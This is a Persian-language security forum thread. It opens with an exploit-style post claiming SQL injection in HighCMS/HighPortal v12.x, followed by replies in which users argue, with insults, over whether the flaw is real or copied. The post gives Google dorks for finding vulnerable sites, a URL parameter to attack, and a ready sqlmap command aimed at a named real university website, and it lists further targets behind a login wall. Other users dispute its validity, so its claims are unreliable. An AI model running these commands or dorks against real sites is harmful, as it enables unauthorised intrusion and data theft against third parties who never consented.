رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

E1.Coders

HighCMS/HighPortal v12.x SQL Inj

پست های پیشنهاد شده

# Exploit Title: HighCMS/HighPortal v12.x SQL Inj

Type : WEBAPPS "HighCMS/HighPortal"
Platform :  ASP.NET
# Date :  4/23/2022
# Exploit Author :  E1.Coders
# Software Link :

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

# Version :  v12.x
# Category :  Webapps
# Tested on: Linux/Windows
# Google Dork: inurl:index.jsp?siteid=1&fkeyid=&siteid=1&pageid=

# Google Dork: <©2022 HighCMS/HighPortal"


Step 1: Enter the address of the "page" that has the problem of sql injection attacks  
http: //TARGET/index.jsp? Siteid = 1 & fkeyid = & siteid = 1 & pageid = 6528 Default credentials.      ( is True )
STEP 2 : Send the following request "
or
Use sqlmap : python sqlmap.py -u "https://www.ihu.ac.ir/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=11211"


TARGET :

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

اول اینکه این اکسپلویت رو تو ننوشتی و از
exploit db
برداشتی
دوم اینکه هیچ کدوم از سایتایی که به عنوان تارگت گذاشتی اصلا آسیب پذیر نیستن
سوم اینکه برای اثبات آسیب پذیری
sql injection
باید حداقل اسم دیتابیس هارو بکشی بیرون و به عنوان اثبات قرار بدی
در غیر این صورت این کار تو هیچ ارزشی نداره و بدرد نمیخوره
 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
12 hours ago, Sh4d0W said:

اول اینکه این اکسپلویت رو تو ننوشتی و از
exploit db
برداشتی
دوم اینکه هیچ کدوم از سایتایی که به عنوان تارگت گذاشتی اصلا آسیب پذیر نیستن
سوم اینکه برای اثبات آسیب پذیری
sql injection
باید حداقل اسم دیتابیس هارو بکشی بیرون و به عنوان اثبات قرار بدی
در غیر این صورت این کار تو هیچ ارزشی نداره و بدرد نمیخوره
 

معلوم بد داری میسوزی :))

  اول از همه تا الان این باگ اسکیول اینجکت

براش کشف نشده و توسایتی ک میگی اصلا چنین باگی نیست

دوم لمر سایت توسط چند سازمان مثل پدافند / ماهر  / فتا / اپا... و خود سازندش تاییدشده و درحال پچ شدن

و هیچکی این قدر خر نیست سایت دولتی مهم بزنه و ندونه میگیرنش دهنش سرویس میشه

ویرایش شده توسط cyber_police

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
15 hours ago, cyber_police said:

معلوم بد داری میسوزی :))

  اول از همه تا الان این باگ اسکیول اینجکت

براش کشف نشده و توسایتی ک میگی اصلا چنین باگی نیست

دوم لمر سایت توسط چند سازمان مثل پدافند / ماهر  / فتا / اپا... و خود سازندش تاییدشده و درحال پچ شدن

و هیچکی این قدر خر نیست سایت دولتی مهم بزنه و ندونه میگیرنش دهنش سرویس میشه

تو چی میگی این وسط ؟
میگم اصلا باگی وجود نداره و این گزارش الکی هست
دوم اینکه کجا تایید شده توسط این سازمان هایی که میگی؟
 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برو بچه تو حتی باگم ثبت نداری و نمیدونی باگ چیه زرزر میکنی

اسکریپت کیدز

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

به قول دوستمون 

HEY SCRIPT KIDS " لمر کوچولو" SHUT UP NOW

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

 

 

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
15 minutes ago, E1.Coders said:

به قول دوستمون 

HEY SCRIPT KIDS " لمر کوچولو" SHUT UP NOW

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

 

جواب؟

 

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

فعلا که هم باگ ثبت هم اسکرین میگه در حال پیگیرین‌‌

 

تو لمرم کم گوز گوز کن

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.


تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...